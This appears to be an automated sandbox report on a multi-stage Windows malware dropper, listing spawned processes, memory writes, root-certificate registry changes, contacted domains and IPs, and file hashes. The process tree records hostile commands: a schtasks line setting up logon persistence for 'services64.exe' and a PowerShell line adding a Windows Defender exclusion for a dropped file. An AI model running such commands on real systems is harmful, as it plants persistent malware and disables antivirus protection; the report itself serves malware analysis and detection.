Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 272

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 964

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
N/A 127.0.0.1:49291 tcp
N/A 127.0.0.1:49293 tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 184.50.113.144:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 72.246.29.11:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

memory/2576-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS406F7727\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2576-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2576-28-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS406F7727\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

memory/2576-48-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-47-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-46-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-43-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-40-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/776-90-0x0000000001150000-0x000000000117C000-memory.dmp

memory/1696-89-0x0000000000870000-0x0000000000878000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
